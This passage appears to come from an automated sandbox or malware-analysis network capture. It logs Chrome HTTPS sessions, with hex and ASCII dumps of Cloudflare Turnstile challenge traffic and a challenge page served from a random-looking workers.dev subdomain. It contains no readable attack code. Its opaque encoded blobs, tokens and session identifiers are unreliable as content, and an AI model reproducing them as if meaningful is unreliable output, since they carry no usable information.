6f 64 30 30 62 45 4a 63 30 30 6c 30 7a 74 6f 6f 71 79 6f 30 32 44 38 41 30 64 5a 4c 30 66 4e 4b 38 61 38 30 56 32 33 67 65 71 Data Ascii: v_879669880fea0acd=21qOtO4OxOWO6I07I0iOIRdJ6KIY060rwRLye0nf0qeYcUD0Ye6vUYzf0zTJUJUAcl0IJH0NOYLAS0vE-K0vRUA05ERtf0UOH08I0foovL0f1lYlqHdh04RUxgGHll0A06rtdB3gsBv1LkSM00MtolMTFAtKh1afl0b3pJhO090ouk06b6zYJu60UzokK0fPZfod00bEJc00l0ztooqyo02D8A0dZL0fNK8a80V23geq
2024-04-24 13:24:18 UTC	778	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:18 GMT Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: close cf-chl-gen: XaonaQJHr+O6YArHOuxEFJ866/kxxcdzkPtVqsHeQH6yd5SanqhLkYAG0eeSF4TjSuOx3kpYUy0vEOzMsa1ufESJoUooxlm+tZBmtbbE/t4FqNEUuIn/Y/tAwNJyOYMbrYooirszqPTec9W21pLvCzq7Ru/6EYaFyeKbeAAeKpGrpfajMCZV9lWf9tKkSJNqyo5gDg3xar+EIuZrW9SiXdb19Symwd3ZT0VA6rnT/pl0F5lh4jiR+9RaoiiTU26tf1teOvx9RpWGEMHe27F5doiulXjOBHVWA7sBvpZRHwZyg8oALFh6nhSLD+PcWN2DvCMJSXWnEPCgS1+hT/SAPsVp2aXxsluZIwG0BD5dPjcUMuSqsLeli6c2qJB1iistvgB5p8K64TJfFT7SlfE4NAVpyTcNebVXGHC1KBgM5iGonq9t3PT/gEQGOGFR0qdyOsGg7AzciGnFEjWJhUM9nJCsi/mZYpQMoLhtv+X4PR0=$/RuiSXOBxBm8MBp0v5/sXQ== vary: accept-encoding Server: cloudflare CF-RAY: 879669addb20a982-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:18 UTC	518	IN	Data Raw: 31 66 66 0d 0a 6a 6e 65 35 6a 5a 4f 2b 78 4c 75 43 78 4b 4b 6e 6e 4a 36 6f 78 73 53 4e 72 59 4c 4e 70 59 58 4a 6f 74 61 52 70 63 4b 76 79 4c 7a 61 32 62 32 64 79 65 48 4e 32 4f 54 45 36 4c 54 6b 34 36 69 69 35 72 7a 6c 7a 38 4b 78 30 4f 32 76 38 73 72 4b 38 65 37 31 32 38 2f 53 33 50 76 39 77 4c 57 32 2f 63 53 39 30 41 62 6a 39 51 51 4e 37 64 37 6e 44 74 44 38 36 78 4c 56 38 75 41 62 32 4d 30 58 46 75 63 4b 49 53 45 42 4a 52 49 69 49 66 6e 6b 4a 75 63 61 44 41 4c 74 44 53 73 77 48 42 4d 50 37 69 41 52 4d 41 63 38 46 77 6f 6e 45 54 55 77 2b 54 7a 39 4d 53 35 46 41 67 41 57 53 68 77 49 4f 51 6f 4f 45 41 67 78 4b 6a 49 4d 57 43 45 69 4d 68 51 62 4b 6a 49 32 53 69 6b 59 47 56 30 6c 4c 69 39 57 4e 54 4e 58 61 55 78 44 53 6b 68 45 4c 45 64 73 59 47 64 34 54 6d Data Ascii: 1ffjne5jZO+xLuCxKKnnJ6oxsSNrYLNpYXJotaRpcKvyLza2b2dyeHN2OTE6LTk46ii5rzlz8Kx0O2v8srK8e7128/S3Pv9wLW2/cS90Abj9QQN7d7nDtD86xLV8uAb2M0XFucKISEBJRIiIfnkJucaDALtDSswHBMP7iARMAc8FwonETUw+Tz9MS5FAgAWShwIOQoOEAgxKjIMWCEiMhQbKjI2SikYGV0lLi9WNTNXaUxDSkhELEdsYGd4Tm
2024-04-24 13:24:18 UTC	1369	IN	Data Raw: 31 31 37 37 0d 0a 2b 2b 6a 30 51 51 41 73 42 4f 79 51 51 4a 44 55 61 42 55 46 4d 54 45 68 4a 51 30 77 63 4c 78 31 4c 4b 30 67 35 57 53 38 6c 47 55 59 73 57 6c 46 53 4c 79 34 69 49 44 6f 2f 47 30 41 68 4f 6d 34 37 56 30 38 36 5a 31 78 71 51 6e 46 4a 5a 30 68 57 56 58 4a 65 55 6a 6c 52 59 47 4d 2b 57 58 4a 79 50 6e 4e 41 63 6f 4f 49 68 49 5a 67 66 30 78 6e 5a 35 56 54 61 31 46 34 61 70 5a 77 62 70 78 61 6d 5a 68 61 57 61 46 6b 64 35 71 68 6b 58 53 47 71 59 52 72 61 59 6d 78 5a 33 75 4d 68 71 47 71 69 59 71 74 68 58 57 4d 74 62 43 7a 71 62 36 4c 6c 63 43 2b 6e 73 69 2f 75 63 48 46 79 70 61 33 72 35 43 52 30 71 7a 47 77 70 36 51 71 70 48 62 71 4c 61 33 76 63 65 72 33 65 47 33 6e 72 50 50 31 4e 37 56 34 74 69 32 37 75 66 62 38 61 6e 44 78 4b 7a 64 36 2f 6a 78 Data Ascii: 1177++j0QQAsBOyQQJDUaBUFMTEhJQ0wcLx1LK0g5WS8lGUYsWlFSLy4iIDo/G0AhOm47V086Z1xqQnFJZ0hWVXJeUjlRYGM+WXJyPnNAcoOIhIZgf0xnZ5VTa1F4apZwbpxamZhaWaFkd5qhkXSGqYRraYmxZ3uMhqGqiYqthXWMtbCzqb6LlcC+nsi/ucHFypa3r5CR0qzGwp6QqpHbqLa3vcer3eG3nrPP1N7V4ti27ufb8anDxKzd6/jx
2024-04-24 13:24:18 UTC	1369	IN	Data Raw: 73 65 4d 42 77 32 39 6a 6b 33 42 42 38 6f 46 43 45 61 53 53 6b 49 47 69 6f 39 54 6a 4d 70 4d 77 35 46 4f 56 70 50 4d 68 68 59 4f 7a 67 63 4e 69 77 36 4f 7a 77 79 50 45 6b 2b 5a 6b 70 6e 63 46 78 48 63 6e 4a 53 5a 55 56 30 62 56 55 77 4f 48 64 6e 4e 6e 4e 74 67 44 52 75 68 44 31 5a 59 30 42 78 56 6d 64 34 52 57 46 72 58 56 71 53 6b 6e 53 51 63 57 56 72 56 5a 64 59 6a 49 5a 64 6a 5a 6d 43 6e 57 4b 58 68 58 69 5a 6c 34 70 39 5a 6d 53 73 70 59 71 64 69 59 31 39 71 59 47 57 71 36 2b 52 67 34 53 47 6b 61 65 74 6f 4a 57 7a 6b 4a 53 78 75 34 57 59 6b 72 76 4b 75 73 32 76 71 72 43 2f 70 61 4b 51 77 4d 76 4b 72 4b 79 55 31 61 69 38 33 4c 48 68 30 39 69 39 73 4d 4b 76 76 63 4f 6f 34 62 32 35 6e 38 6a 49 34 75 48 6a 33 2b 54 48 77 2f 50 74 74 64 6e 61 36 62 57 77 79 Data Ascii: seMBw29jk3BB8oFCEaSSkIGio9TjMpMw5FOVpPMhhYOzgcNiw6OzwyPEk+ZkpncFxHcnJSZUV0bVUwOHdnNnNtgDRuhD1ZY0BxVmd4RWFrXVqSknSQcWVrVZdYjIZdjZmCnWKXhXiZl4p9ZmSspYqdiY19qYGWq6+Rg4SGkaetoJWzkJSxu4WYkrvKus2vqrC/paKQwMvKrKyU1ai83LHh09i9sMKvvcOo4b25n8jI4uHj3+THw/Pttdna6bWwy
2024-04-24 13:24:18 UTC	1369	IN	Data Raw: 31 2f 67 55 47 43 52 64 48 47 41 34 2b 4b 45 77 63 4c 43 45 4f 46 69 41 74 4a 52 64 4b 4e 46 42 4f 58 45 6f 65 55 56 67 7a 4f 7a 64 53 50 44 6b 32 54 43 31 43 62 6b 78 4a 61 6e 4a 75 64 47 42 45 52 58 68 5a 57 31 70 47 55 31 52 7a 4e 33 35 55 67 45 4b 42 64 59 56 6d 59 48 68 62 52 33 35 63 58 6c 79 41 57 32 46 70 5a 56 64 6c 57 5a 70 30 6a 6c 71 52 69 32 68 35 57 59 43 59 6b 6d 56 34 6c 35 64 79 61 71 6c 39 65 6d 57 65 65 61 75 4d 6c 57 32 76 74 6d 71 58 68 61 53 78 6d 4a 43 4f 6a 4c 4f 67 6a 34 79 6d 6c 59 47 5a 6d 38 6a 46 69 73 47 68 78 71 75 4a 79 39 4b 47 72 36 48 41 7a 62 53 74 71 71 6a 50 76 4b 75 6f 77 72 47 64 74 63 4f 69 6f 62 33 57 32 4e 75 70 79 61 37 58 72 39 37 6a 34 61 32 78 72 66 6a 42 2b 4d 76 49 36 38 58 4d 32 4d 41 43 30 51 49 41 37 75 Data Ascii: 1/gUGCRdHGA4+KEwcLCEOFiAtJRdKNFBOXEoeUVgzOzdSPDk2TC1CbkxJanJudGBERXhZW1pGU1RzN35UgEKBdYVmYHhbR35cXlyAW2FpZVdlWZp0jlqRi2h5WYCYkmV4l5dyaql9emWeeauMlW2vtmqXhaSxmJCOjLOgj4ymlYGZm8jFisGhxquJy9KGr6HAzbStqqjPvKuowrGdtcOiob3W2Nupya7Xr97j4a2xrfjB+MvI68XM2MAC0QIA7u
2024-04-24 13:24:18 UTC	372	IN	Data Raw: 54 55 6f 67 54 67 39 54 51 55 74 4e 4c 79 31 4b 53 6a 6f 57 4b 69 77 37 4c 43 70 59 4d 31 6f 76 49 31 6f 38 56 6b 4e 64 4b 6d 42 65 58 7a 78 65 59 6b 42 69 53 48 46 53 4e 30 39 6f 54 33 68 32 64 58 42 67 51 56 42 72 56 31 5a 6d 57 56 4e 6a 68 34 56 6b 62 57 5a 76 6a 34 42 4d 6a 49 31 76 61 33 5a 73 6c 59 32 4d 6b 6e 35 74 65 6f 31 78 69 70 36 68 58 5a 32 44 6f 4a 61 6c 6c 33 65 56 70 61 69 52 67 6d 39 7a 72 57 79 72 6d 4b 36 72 70 4a 69 54 72 36 69 4f 6c 36 36 39 67 71 47 52 6b 35 43 54 6d 59 71 6a 68 70 57 62 6f 73 79 2f 78 49 58 43 76 37 2b 55 78 37 47 6e 73 63 37 4d 6e 64 65 30 72 4d 4b 65 6e 4b 58 6c 77 4e 75 7a 35 4c 58 56 32 65 76 71 77 4f 6d 39 7a 4f 72 7a 31 39 43 32 74 62 4c 53 72 76 62 64 31 4f 48 32 77 66 44 35 32 51 4c 68 77 4f 50 34 43 77 6a Data Ascii: TUogTg9TQUtNLy1KSjoWKiw7LCpYM1ovI1o8VkNdKmBeXzxeYkBiSHFSN09oT3h2dXBgQVBrV1ZmWVNjh4VkbWZvj4BMjI1va3ZslY2Mkn5teo1xip6hXZ2DoJall3eVpaiRgm9zrWyrmK6rpJiTr6iOl669gqGRk5CTmYqjhpWbosy/xIXCv7+Ux7Gnsc7Mnde0rMKenKXlwNuz5LXV2evqwOm9zOrz19C2tbLSrvbd1OH2wfD52QLhwOP4Cwj
2024-04-24 13:24:18 UTC	342	IN	Data Raw: 31 34 66 0d 0a 35 66 52 44 70 45 61 6c 5a 4b 61 32 42 44 4b 57 6c 4d 53 53 31 48 53 45 30 78 53 6a 68 4e 53 45 68 51 57 58 4e 30 55 6e 73 38 56 58 31 51 58 58 42 63 63 33 39 6b 68 6c 68 6c 52 6d 5a 61 53 34 52 52 63 34 56 78 69 30 79 4f 6a 46 6c 30 66 57 6c 32 62 35 35 2b 58 57 39 2f 6b 71 4f 49 66 6f 69 74 67 6d 6c 73 70 6f 6c 74 68 35 36 4e 63 59 75 4d 6b 58 57 4f 65 35 56 35 6b 71 39 36 78 49 36 50 6f 4a 4b 79 6f 61 62 45 6a 4d 72 44 78 59 4c 50 72 61 69 2b 31 61 62 44 77 72 47 77 74 73 32 59 74 61 6a 4c 76 61 33 64 30 4a 2f 66 78 72 75 6f 78 2b 50 6b 77 63 69 72 37 65 79 6b 7a 63 33 6f 77 4d 69 79 2b 63 7a 49 2b 50 6d 35 38 37 4c 70 37 73 33 44 30 63 4c 41 78 74 58 64 44 4d 7a 56 33 52 44 4f 36 66 49 50 2f 63 34 4b 43 77 62 73 46 64 72 6c 42 67 72 6f Data Ascii: 14f5fRDpEalZKa2BDKWlMSS1HSE0xSjhNSEhQWXN0Uns8VX1QXXBcc39khlhlRmZaS4RRc4Vxi0yOjFl0fWl2b55+XW9/kqOIfoitgmlspolth56NcYuMkXWOe5V5kq96xI6PoJKyoabEjMrDxYLPrai+1abDwrGwts2YtajLva3d0J/fxruox+Pkwcir7eykzc3owMiy+czI+Pm587Lp7s3D0cLAxtXdDMzV3RDO6fIP/c4KCwbsFdrlBgro
2024-04-24 13:24:18 UTC	345	IN	Data Raw: 31 35 32 0d 0a 46 39 62 48 6a 78 69 59 57 59 38 4f 6a 59 6a 52 45 6f 37 50 45 68 52 4b 30 56 47 55 30 64 58 53 6e 68 32 54 47 5a 4a 53 7a 74 75 58 57 45 2f 62 6f 5a 57 65 48 74 45 53 59 78 35 52 57 52 65 61 49 46 6f 59 6d 4b 56 6b 57 4a 6e 69 57 39 75 62 5a 35 7a 61 6d 39 63 67 70 53 56 58 48 79 47 65 57 46 2f 71 6c 35 32 5a 70 2b 68 62 4b 56 2b 73 49 79 49 74 34 47 77 73 72 53 30 73 5a 75 6f 6b 71 4a 39 67 72 69 5a 74 6f 4b 6f 68 71 72 48 6f 71 62 43 69 49 66 47 6e 37 37 46 74 61 76 46 73 36 69 6f 75 4a 57 78 6d 63 75 37 34 63 47 2b 33 74 6a 55 78 74 2f 59 33 4e 7a 57 33 73 54 4b 79 76 4c 48 34 4f 54 75 38 74 4c 69 73 4f 50 53 36 72 58 70 39 50 49 44 31 65 50 58 42 38 58 33 2f 50 66 62 43 4d 6a 37 79 38 63 53 34 75 76 4a 46 74 49 49 39 65 41 54 39 52 62 Data Ascii: 152F9bHjxiYWY8OjYjREo7PEhRK0VGU0dXSnh2TGZJSztuXWE/boZWeHtESYx5RWReaIFoYmKVkWJniW9ubZ5zam9cgpSVXHyGeWF/ql52Zp+hbKV+sIyIt4GwsrS0sZuokqJ9griZtoKohqrHoqbCiIfGn77FtavFs6iouJWxmcu74cG+3tjUxt/Y3NzW3sTKyvLH4OTu8tLisOPS6rXp9PID1ePXB8X3/PfbCMj7y8cS4uvJFtII9eAT9Rb
2024-04-24 13:24:18 UTC	261	IN	Data Raw: 66 66 0d 0a 75 53 46 59 32 58 6b 77 35 4d 6c 5a 4a 50 69 46 69 56 54 39 4f 4a 32 39 6f 59 47 51 77 52 30 74 46 62 45 70 75 58 47 31 33 62 57 74 31 65 48 64 5a 59 56 56 67 66 32 68 64 66 32 42 65 65 6f 52 67 58 6f 47 48 62 6d 2b 4a 69 56 4f 56 6b 34 32 58 68 5a 56 72 6b 4a 46 39 6e 34 4b 41 62 32 35 66 5a 59 68 31 65 59 43 63 65 59 68 34 67 47 36 6e 71 72 4b 49 69 71 36 58 62 4c 79 36 68 37 58 41 66 72 2b 2f 66 4d 47 42 6f 38 69 6d 71 6f 43 61 69 49 69 68 71 38 75 72 79 4b 65 39 71 34 2b 50 74 71 47 55 70 70 65 64 74 63 6d 53 7a 2b 48 52 6f 70 37 50 34 4b 65 6d 73 39 37 74 33 61 37 66 71 72 79 71 37 2b 61 2f 7a 65 6e 75 73 4f 4c 62 38 4e 7a 78 2b 77 48 4f 76 72 55 42 37 38 4c 6a 36 64 73 43 2b 66 6a 33 78 74 37 75 37 41 59 4c 42 51 41 4a 45 4f 45 43 38 65 Data Ascii: ffuSFY2Xkw5MlZJPiFiVT9OJ29oYGQwR0tFbEpuXG13bWt1eHdZYVVgf2hdf2BeeoRgXoGHbm+JiVOVk42XhZVrkJF9n4KAb25fZYh1eYCceYh4gG6nqrKIiq6XbLy6h7XAfr+/fMGBo8imqoCaiIihq8uryKe9q4+PtqGUppedtcmSz+HRop7P4Kems97t3a7fqryq7+a/zenusOLb8Nzx+wHOvrUB78Lj6dsC+fj3xt7u7AYLBQAJEOEC8e
2024-04-24 13:24:18 UTC	260	IN	Data Raw: 66 65 0d 0a 77 52 47 4e 63 50 34 79 48 38 48 39 30 55 38 39 77 47 2b 4f 73 45 42 2f 67 4b 4b 69 7a 7a 41 79 66 7a 44 78 67 45 45 51 6f 35 47 66 63 4b 47 69 30 2b 49 78 6b 6a 2f 54 6a 37 52 45 78 46 51 6a 77 59 49 77 73 38 51 53 59 30 49 55 38 70 4f 44 55 63 4c 7a 77 61 50 6a 5a 4d 53 30 46 50 59 32 5a 47 58 6a 74 72 61 44 55 35 53 47 46 4a 55 79 74 31 51 45 4e 66 59 47 31 79 65 55 52 53 54 58 42 4a 61 6d 4e 54 64 58 4d 39 52 6e 56 66 69 47 52 34 53 49 68 6d 61 6f 42 65 61 6f 56 4e 58 32 31 34 62 6d 6d 4b 6d 34 5a 39 63 33 52 2b 6d 35 74 68 70 6d 36 6d 6b 4a 65 4a 66 71 61 4b 6f 35 32 41 6e 6e 36 63 61 34 53 76 6f 37 4f 6a 74 37 71 61 76 6f 61 37 71 58 35 38 75 35 69 64 6b 61 43 2b 78 36 75 44 7a 5a 57 46 6d 70 2f 4b 6f 6f 6d 65 78 4a 36 51 78 4b 32 79 78 Data Ascii: fewRGNcP4yH8H90U89wG+OsEB/gKKizzAyfzDxgEEQo5GfcKGi0+Ixkj/Tj7RExFQjwYIws8QSY0IU8pODUcLzwaPjZMS0FPY2ZGXjtraDU5SGFJUyt1QENfYG1yeURSTXBJamNTdXM9RnVfiGR4SIhmaoBeaoVNX214bmmKm4Z9c3R+m5thpm6mkJeJfqaKo52Ann6ca4Svo7Ojt7qavoa7qX58u5idkaC+x6uDzZWFmp/KoomexJ6QxK2yx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49753	172.67.203.167	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:18 UTC	380	OUT	GET /favicon.ico HTTP/1.1 Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:18 UTC	591	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:18 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 3255 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ShjXLeQZIfSvTl6asq8HgxaOXlvSl8oVkLIflgM1jlDOPLjQocUmJxJheaXH%2BUwZHQIg%2BktQm%2FH8uUyCaqjIG0wGUfY%2FTeGfojhnsbNuURACqUR8aAMRQ1nyNEuyaKC7mqNJopfwsiavTt4D3TWX%2FOBoVGRq%2Fwg4ZWPCO%2FG%2BGEk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 879669b0dabd3235-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:18 UTC	778	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 Data Ascii: <!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewpor
2024-04-24 13:24:18 UTC	1369	IN	Data Raw: 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e Data Ascii: ont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-color:transparent;text-decoration:n
2024-04-24 13:24:18 UTC	1108	IN	Data Raw: 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 72 69 6e 67 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e Data Ascii: argin-bottom:1rem}}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}@media (prefers-color-scheme:dark){body{backgroun

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49755	104.17.2.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:19 UTC	486	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:20 UTC	377	IN	HTTP/1.1 400 Bad Request Date: Wed, 24 Apr 2024 13:24:20 GMT Content-Type: application/json Content-Length: 7 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: iEhaZxP1O3xUj0vK8+q04A==$s+ivQ5BGVcNhnBz+LlaIgw== Server: cloudflare CF-RAY: 879669b90da969e6-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:20 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49756	104.17.3.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:19 UTC	804	OUT	GET /cdn-cgi/challenge-platform/h/b/pat/879669880fea0acd/1713965058384/5bc5949f26cf89d93f31e31abc75d33badd9ed53032d1de910949dd3595c52bb/fXUOLayyxgzrnsg HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:20 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Wed, 24 Apr 2024 13:24:20 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 1 Connection: close
2024-04-24 13:24:20 UTC	1382	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 57 38 57 55 6e 79 62 50 69 64 6b 5f 4d 65 4d 61 76 48 58 54 4f 36 33 5a 37 56 4d 44 4c 52 33 70 45 4a 53 64 30 31 6c 63 55 72 73 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gW8WUnybPidk_MeMavHXTO63Z7VMDLR3pEJSd01lcUrsAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2024-04-24 13:24:20 UTC	1	IN	Data Raw: 4a Data Ascii: J

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49759	104.17.3.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:20 UTC	775	OUT	GET /cdn-cgi/challenge-platform/h/b/i/879669880fea0acd/1713965058385/hyoDSXK0siA_93U HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:21 UTC	200	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:21 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 879669c0ddef09f1-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:21 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3b 00 00 00 06 08 02 00 00 00 f2 a3 71 97 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR;qIDAT$IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49760	104.17.3.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

